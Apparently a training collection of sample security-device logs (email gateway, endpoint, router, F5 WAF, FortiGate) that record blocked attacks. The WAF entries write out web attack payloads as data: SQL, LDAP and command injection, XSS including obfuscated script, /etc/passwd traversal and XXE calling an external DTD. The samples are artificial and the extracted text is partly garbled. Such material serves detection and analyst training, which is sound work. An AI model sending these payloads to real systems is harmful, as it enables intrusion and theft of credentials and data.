Scribd
Upload
15 views26 pages

Raw Logs

Cybersecurity raw device sample logs

Uploaded by

denver780980
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views26 pages

Raw Logs

Cybersecurity raw device sample logs

Uploaded by

denver780980
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 26

RAW LOGS

A. Device type: Trend Micro Email Security


2024-05-25 14:30:00 [INFO] Mail Tracking Log:

- Message ID: <[email protected]>

- Sender: [email protected]

- Recipient: [email protected]

- Subject: Test Email

- A achment: example.docx

- Threat Detec on: Malware detected (Trojan.GenericKD.123456)

- Ac on: Blocked

2024-05-25 14:31:00 [INFO] Policy Event Log:

- Policy Name: Default Policy

- Event Type: Spam Detec on

- Message ID: <[email protected]>

- Sender: [email protected]

- Recipient: [email protected]

- Subject: Spam Email

- Spam Score: 95

- Ac on: Tagged

2024-05-25 14:32:00 [INFO] URL Click Tracking Log:

- URL: h p://example.com/malicious_url

- Message ID: <[email protected]>

- Sender: [email protected]

- Recipient: [email protected]

- Clicked: Yes

- Threat Detec on: Malware detected (Ransomware.Generic.123456)

- Ac on: Blocked

1
2024-05-25 14:30:00 [INFO] Policy Event Log:

- Policy Name: Default Policy

- Event Type: Spam Detec on

- Message ID: <[email protected]>

- Sender: [email protected]

- Recipient: [email protected]

- Subject: Spam Email

- Spam Score: 95

- Ac on: Tagged (Spam)

2024-05-25 14:30:00 [INFO] Policy Event Log:

- Policy Name: Default Policy

- Event Type: Spam Detec on

- Message ID: <[email protected]>

- Sender: [email protected]

- Recipient: [email protected]

- Subject: Spam Email

- Scan Result: 10--5.534000-4.000000

- Ac on: Tagged (Spam)

B. Device type: Trend Micro Apex one


CEF:0|Trend Micro|Apex One|<Product version>|1000|File Created|5|suser=<username> dvc=<IP
address> dst=<file path>

LEEF:1.0|Trend Micro|Apex One|<Product version>|1001|Threat Detected|10|suser=<username>


dvc=<IP address> dst=<file path> threat=<threat name>

LEEF:1.0|Trend Micro|Apex One|1.0|1000|A ack Discovery Detec on


Event|4|vmid=1234567890,dname=DeviceName,dip=192.168.1.100,severity=4,policy=Default
Policy,subject=Malware Detec on,domainimpacted=example.com

2
LEEF:1.0|Trend Micro|Apex One|1.0|1001|Behavior Monitoring
Event|5|vmid=1234567890,severity=5,policy=Default
Policy,process=svchost.exe,object=C:\Windows\System32\svchost.exe,ac on=Blocked,tag1=Malw
are,reason=Behavioral Detec on

LEEF:1.0|Trend Micro|Apex One|1.0|1002|C&C Callback


Event|4|vmid=1234567890,sip=192.168.1.100,domainorigin=example.com,policy=Default
Policy,ac on=Blocked,tag1=Malware,url=h p://example.com/malware

LEEF:1.0|Trend Micro|Apex One|1.0|1003|Content Security


Event|5|vmid=1234567890,[email protected],ac on=Blocked,tag1=Spam,subject=Spa
m Email,[email protected],url=h p://example.com/spam

LEEF:1.0|Trend Micro|Apex One|1.0|1004|Data Loss Preven on


Event|4|vmid=1234567890,severity=4,policy=Default
Policy,sip=192.168.1.100,smac=00:11:22:33:44:55,sname=DeviceName,login=user,object=C:\Users
\user\Documents\confiden al.docx,ac on=Blocked,tag1=DLP,reason=Data Loss Preven on

C. Device type: Cisco Router

< me_stamp> <source_IP_address> <des na on_IP_address> <protocol> <informa on>

12:01:02 192.168.1.1 8.8.8.8 TCP Established

[cri cal-a ack]" => "(?i)(?<=\s)%(SYSMGR|SECURITY)-(?<severity>[0-9]+)-(?<signature>[A-Z0-9_]+

May 25 2024 12:01:02: %SYS-5-LOG_ALERT: DDoS a ack detected from 192.168.1.100 to


192.168.2.100 on interface GigabitEthernet0/1

May 25 2024 12:01:03: %SYS-5-LOG_ALERT: DDoS a ack detected from 192.168.1.101 to


192.168.2.100 on interface GigabitEthernet0/1

3
d. WAF F5

2024-05-25 14:30:00,123 INFO [WAF] [General] [policy_name] [a ack_type] [sig_ids] [sig_names]


[viola ons] [sub_viola ons] [request] [response_code] [ip_client] [dest_ip] [dest_port] [method]
[uri] [query_string] [headers] [geo_loca on] [ip_address_intelligence] [management_ip_address]
[route_domain] [session_id] [support_id] [unit_hostname] [username]
[x_forwarded_for_header_value]

SQL Injec on a ack:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [SQL Injec on] [2000031] [SQL
Injec on - UNION] [Illegal User Input] [SQL Injec on - UNION] [GET /index.php?username=' OR
1=1 --] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [username=' OR 1=1 --] [User-
Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0]
[my_bigip] [anonymous] [192.168.1.100]

Cross-Site Scrip ng in WAF:

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Cross-Site Scrip ng] [2000041]
[Cross-Site Scrip ng - HTML] [Illegal User Input] [Cross-Site Scrip ng - HTML] [GET
/index.html?<script>alert(1)</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html]
[<script>alert(1)</script>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US]
[Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

HTTP GET Flood:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET
Flood] [Illegal User Input] [HTTP GET Flood] [GET / HTTP/1.1] [403] [192.168.1.100] [10.10.10.10]
[80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET
Flood] [Illegal User Input] [HTTP GET Flood] [GET /index.php HTTP/1.1] [403] [192.168.1.100]
[10.10.10.10] [80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous]
[192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET
Flood] [Illegal User Input] [HTTP GET Flood] [GET /index.php?id=1 HTTP/1.1] [403] [192.168.1.100]
[10.10.10.10] [80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous]
[192.168.1.100]

Cross-Site Scrip ng:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Cross-Site Scrip ng] [2000041] [Cross-
Site Scrip ng - HTML] [Illegal User Input] [Cross-Site Scrip ng - HTML] [GET
/index.html?<script>alert(1)</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html]
[<script>alert(1)</script>] [User-Agent: Mozilla/5.0, Accept: /, Accept-Language: en-US] [US]
[Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

4
2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Cross-Site Scrip ng] [2000042] [Cross-
Site Scrip ng - JavaScript] [Illegal User Input] [Cross-Site Scrip ng - JavaScript] [GET
/index.php?username=<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%
74%65%28%27%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63
%72%69%70%74%3e%27%29%3b'));</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET]
[/index.php]
[username=<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28
%27%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%7
0%74%3e%27%29%3b'));</script>] [User-Agent: Mozilla/5.0, Accept: /, Accept-Language: en-US]
[US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Cross-Site Scrip ng] [2000043] [Cross-
Site Scrip ng - DOM-Based] [Illegal User Input] [Cross-Site Scrip ng - DOM-Based] [GET
/index.html?<svg/onload=alert(1)>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html]
[<svg/onload=alert(1)>] [User-Agent: Mozilla/5.0, Accept: /, Accept-Language: en-US] [US]
[Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:03,012 INFO [WAF] [General] [my_policy] [Cross-Site Scrip ng] [2000044] [Cross-
Site Scrip ng - Stored] [Illegal User Input] [Cross-Site Scrip ng - Stored] [GET
/index.php?comment=<script>document.write('<img src=h p://example.com/evil.jpg>');</script>]
[403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php]
[comment=<script>document.write('<img src=h p://example.com/evil.jpg>');</script>] [User-
Agent: Mozilla/5.0, Accept: /, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip]
[anonymous] [192.168.1.100]

Session Hijacking:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000051] [Session
Hijacking - Cookie The ] [Illegal User Input] [Session Hijacking - Cookie The ] [GET /index.html
HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html] [Cookie:
session_id=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US]
[US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000052] [Session
Hijacking - Session Fixa on] [Illegal User Input] [Session Hijacking - Session Fixa on] [GET
/index.php?PHPSESSID=1234567890abcdef HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80]
[GET] [/index.php] [PHPSESSID=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000053] [Session
Hijacking - Session Predic on] [Illegal User Input] [Session Hijacking - Session Predic on] [GET
/index.jsp;jsessionid=1234567890abcdef HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET]
[/index.jsp] [jsessionid=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]]

5
Command Injec on in WAF:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Command Injec on] [2000061]
[Command Injec on - System Command] [Illegal User Input] [Command Injec on - System
Command] [GET /index.php?cmd=cat+/etc/passwd HTTP/1.1] [403] [192.168.1.100] [10.10.10.10]
[80] [GET] [/index.php] [cmd=cat+/etc/passwd] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Command Injec on] [2000062]
[Command Injec on - SQL Injec on] [Illegal User Input] [Command Injec on - SQL Injec on] [GET
/index.php?id=1+OR+1=1 HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php]
[id=1+OR+1=1] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious]
[10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Command Injec on] [2000063]
[Command Injec on - LDAP Injec on] [Illegal User Input] [Command Injec on - LDAP Injec on]
[GET /index.php?username=*)(|(password=*)) HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80]
[GET] [/index.php] [username=*)(|(password=*))] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

XML External En ty (XXE) in WAF:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [XXE] [2000071] [XXE - Blind XXE]
[Illegal User Input] [XXE - Blind XXE] [POST /check.php HTTP/1.1] [403] [192.168.1.100]
[10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-8859-
1"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'h p://example.com/xxe.dtd'>
]><comment><text>&xxe;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [XXE] [2000072] [XXE - XXE with
External DTD] [Illegal User Input] [XXE - XXE with External DTD] [POST /check.php HTTP/1.1] [403]
[192.168.1.100] [10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-
8859-1"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "h p://example.com/xxe.dtd"> %remote;
]><comment><text>&test;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [XXE] [2000073] [XXE - XXE with
Internal DTD] [Illegal User Input] [XXE - XXE with Internal DTD] [POST /check.php HTTP/1.1] [403]
[192.168.1.100] [10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-
8859-1"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "h p://example.com/xxe.dtd"> %remote;
]><comment><text>&test;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-
Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

6
Remote code execu on a ack in WAF:

<24>May 25 2024 12:00:00 f5-bigip: [ip_address] 12345 [host] "GET /path/to/vulnerable/script


HTTP/1.1" - 400 267 "-" "Mozilla/5.0 (compa ble; F5 BIG-IP)" 0 0
"h ps://www.example.com/legal?page=terms" "example.com"

Phishing A ack in WAF:

2022-07-25 14:30:10
UTC,172.16.1.100,80,POST,/login.php,HTTP/1.1,403,12346,Phishing,Score:95,Signature:PHISHING_
CREDENTIAL_THEFT,Client IP:192.168.1.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response
Code:403 Forbidden
Watering hole A ack in WAF:
2022-07-25 14:30:05 UTC,172.16.1.100,80,GET,/js/jquery.min.js,HTTP/1.1,403,12345,WATERING
HOLE,Score:90,Signature:WATERING_HOLE_JS_INJECTION,Client IP:192.168.1.100,User-
Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/58.0.3029.110 Safari/537.3,Response Code:403
Forbidden,Referer:h p://example.com/news

2022-07-25 14:30:10
UTC,172.16.1.100,80,GET,/css/bootstrap.min.css,HTTP/1.1,403,12346,WATERING
HOLE,Score:85,Signature:WATERING_HOLE_CSS_INJECTION,Client IP:192.168.1.101,User-
Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/58.0.3029.110 Safari/537.3,Response Code:403
Forbidden,Referer:h p://example.com/blog

2022-07-25 14:30:15 UTC,172.16.1.100,80,GET,/images/logo.png,HTTP/1.1,404,12347,WATERING


HOLE,Score:95,Signature:WATERING_HOLE_IMAGE_INJECTION,Client IP:192.168.1.102,User-
Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/58.0.3029.110 Safari/537.3,Response Code:404 Not
Found,Referer:h p://example.com/about

Spear phishing in WAF:


2022-07-25 14:30:10 UTC,172.16.1.100,80,POST,/hr/benefits.php,HTTP/1.1,403,12346,SPEAR
Phishing,Score:90,Signature:SPEAR_PHISHING_HR,Client IP:192.168.1.101,User-Agent:Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110
Safari/537.3,Response Code:403 Forbidden,Targeted User:[email protected]

2022-07-25 14:30:15
UTC,172.16.1.100,80,GET,/secure/login.aspx,HTTP/1.1,404,12347,Phishing,Score:85,Signature:PHIS

7
HING_FAKE_LOGIN_PAGE,Client IP:192.168.1.102,User-Agent:Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110
Safari/537.3,Response Code:404 Not Found

Bot A ack in WAF:

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com


ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="",support_id="18205860747014045701",request_status="blocked",
response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",
protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",
sig_ids="200021069",sig_names="Automated client access",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="BOT",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12
(linux-gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnec on:
Keep-Alive\r\n\r\n"

<131>Sep 19 13:53:34 bigip-4.pme-ds.f5.com


ASM:CEF:0|F5|ASM|11.3.0|200021069|Automated client access
"wget"|5|dvchost=bigip-4.pme-ds.f5.com dvc=172.16.73.34 cs1=topaz4-web4
cs1Label=policy_name cs2=/Common/topaz4-web4 cs2Label=h p_class_name
deviceCustomDate1=Sep 19 2012 13:49:25
deviceCustomDate1Label=policy_apply_date externalId=18205860747014045723
act=blocked cn1=403 cn1Label=response_code src=10.4.1.101 spt=52975
dst=10.4.1.200 dpt=80 requestMethod=GET app=HTTP cs5=N/A
cs5Label=x_forwarded_for_header_value rt=Sep 19 2012 13:53:33
deviceExternalId=0 cs4=BOT cs4Label=a ack_type cs6=N/A
cs6Label=geo_loca on c6a1= c6a1Label=device_address
c6a2= c6a2Label=source_address c6a3= c6a3Label=des na on_address
c6a4=N/A c6a4Label=ip_address_intelligence msg=N/A
suid=86c4f8bf7349cac9 suser=N/A request=/ cs3Label=full_request cs3=GET /
HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gn,uri="/",
request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gnu)\r\nAccept:
*/*\r\nHost: 10.4.1.200\r\nConnec on: Keep-Alive\r\n\r\n"

8
<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com
ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="",support_id="18205860747014045701",request_status="blocked",
response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",
protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",
sig_ids="200021069",sig_names="Automated client access",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="BOT",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/",request="GET / HTTP

DDOS A ack:
<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com
ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="",support_id="18205860747014045701",request_status="blocked",
response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",
protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",
sig_ids="200021069",sig_names="UDP Flood",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="DDoS",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-
gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnec on: Keep-Alive\r\n\r\n"

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com


ASM:unit_hostname="bigip-4.pme-ds.f5.com",

9
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="",support_id="18205860747014045701",request_status="blocked",
response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",
protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",
sig_ids="200021069",sig_names="SYN Flood",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="DDoS",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-
gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnec on: Keep-Alive\r\n\r\n"

Cross Site Request forgery A ack in WAF:


<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com

ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="CSRF a ack detected",support_id="18205860747014045701",
request_status="blocked",response_code="403",ip_client="10.4.1.101",
route_domain="0",method="POST",protocol="HTTP",query_string="",
x_forwarded_for_header_value="N/A",sig_ids="200021069",
sig_names="CSRF a ack",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="CSRF",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/login",request="POST /login HTTP/1.0\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n
Accept: text/html,applica on/xhtml+xml,applica on/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Content-Type: applica on/x-www-form-urlencoded\r\n
Referer: h p://10.4.1.200/login\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.8\r\n

10
Cookie: session_id=98630496c8413322\r\n\r\n
username=admin&password=password"

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com


ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="CSRF token valida on failed",support_id="18205860747014045701",
request_status="blocked",response_code="403",ip_client="10.4.1.101",
route_domain="0",method="GET",protocol="HTTP",query_string="",
x_forwarded_for_header_value="N/A",sig_ids="200021069",
sig_names="CSRF token valida on",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="CSRF",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/transfer",request="GET /transfer HTTP/1.0\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n
Accept: text/html,applica on/xhtml+xml,applica on/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Referer: h p://10.4.1.200/transfer\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: session_id=98630496c8413322\r\n\r\n"

File inclusion a ack:


<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com
ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="File Inclusion A ack Detected",support_id="18205860747014045701",
request_status="blocked",response_code="403",ip_client="10.4.1.101",

11
route_domain="0",method="GET",protocol="HTTP",query_string="",
x_forwarded_for_header_value="N/A",sig_ids="200021069",
sig_names="File Inclusion A ack",date_ me="2012-09-19 13:40:26",
severity="High",a ack_type="File Inclusion",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",
src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_viola ons="",
virus_name="N/A",uri="/index.php?page=../../../etc/passwd",request="GET
/index.php?page=../../../etc/passwd HTTP/1.0\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n
Accept: text/html,applica on/xhtml+xml,applica on/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Referer: h p://10.4.1.200/index.php\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: session_id=98630496c8413322\r\n\r\n"

Web defacement A ack:


134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com
ASM:unit_hostname="bigip-4.pme-ds.f5.com",
management_ip_address="172.16.73.34",h p_class_name="/Common/topaz4-web4",
policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",
viola ons="",support_id="18205860747014045701",request_status="passed",
response_code="200",ip_client="10.4.1.101",route_domain="0",method="GET",
protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",
sig_ids="",sig_names="",date_ me="2012-09-19 13:40:26",
severity="Informa onal",a ack_type="",geo_loca on="N/A",
ip_address_intelligence="N/A",username="N/A",
session_id="98630496c8413322",src_port="52964",dest_port="80",
dest_ip="10.4.1.200",sub_viola ons="",virus_name="N/A"u)\r\nAccept: */*\r\nHost:
10.4.1.200\r\nConnec on: Keep-Alive\r\n\r\n

For Gate firewall


IP Spoofing :

12
date=2019-05-10 me=11:37:47 logid="0000000013" type="traffic" subtype="forward"
level="no ce" vd="vdom1" even me=1557513467369913239 srcip=10.1.100.11 srcport=58012
srcin ="port12" srcin role="undefined" ds p=23.59.154.35 dstport=80 ds n ="port11"
ds n role="undefined" srcuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" dstuuil="test"
status="success" init="local" mode="main" dir="outbound" stage=1 role="ini ator" result="OK"

DoS:
2022-07-25 14:30:05 log_id=0123456789 type=traffic subtype=dos src_ip=192.168.1.100
src_port=12345 dst_ip=10.10.10.10 dst_port=80 proto=tcp ac on=block policy_id=1234567890
policy_type=user_defined

Port Scan:
2022-07-25 14:30:05 log_id=0123456789 type=traffic subtype=portscan src_ip=192.168.1.100
src_port=12345 dst_ip=10.10.10.10 dst_port=1-1024 proto=tcp ac on=block
policy_id=1234567890 policy_type=user_defined

Login failure:
2022-07-25 14:30:05 log_id=0123456789 type=authen ca on subtype=failed src_ip=192.168.1.100
user_name=jdoe service=ssh reason=invalid_password

Man in the middle a ack:


2022-07-25 14:30:05
UTC,192.168.1.1,10.0.0.1,TCP,80,6,12345,MitM,Score:95,Signature:MITM_SSL_STRIP,Client
IP:192.168.1.100,Server IP:10.0.0.100,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200
OK,URL:h p://example.com/login

2022-07-25 14:30:10
UTC,192.168.1.1,10.0.0.1,TCP,443,6,12346,MitM,Score:90,Signature:MITM_SSL_RENEGOTIATION,Cl
ient IP:192.168.1.101,Server IP:10.0.0.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200
OK,URL:h ps://example.com/login

2022-07-25 14:30:15
UTC,192.168.1.1,10.0.0.1,TCP,80,6,12347,MitM,Score:85,Signature:MITM_SSL_CERTIFICATE_FORGE
RY,Client IP:192.168.1.102,Server IP:10.0.0.102,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response
Code:200 OK,URL:h p://example.com/login

2022-07-25 14:30:20
UTC,192.168.1.1,10.0.0.1,TCP,443,6,12348,MitM,Score:95,Signature:MITM_SSL_SESSION_HIJACKIN

13
G,Client IP:192.168.1.103,Server IP:10.0.0.103,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response
Code:200 OK,URL:h ps://example.com/login

Trend Micro Apex One TM:


Ransomware a ack:
Event Time: 2023-03-14 10:30:15
Device Name: WIN-1234567890
User Name: john.doe
Event Category: Ransomware
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked a ransomware a ack on device WIN-1234567890,
which was ini ated by user john.doe. The ransomware variant detected was iden fied as "STOP
Djvu".

Addi onal Details:


- File Name: C:\Users\john.doe\Downloads\document.pdf.exe
- File Path: C:\Users\john.doe\Downloads\
- File Size: 123456 bytes
- File SHA256 Hash: 0123456789abcdef0123456789abcdef
- File MD5 Hash: 1234567890abcdef1234567890abcdef
- File Crea on Time: 2023-03-14 10:29:55
- File Modifica on Time: 2023-03-14 10:29:55
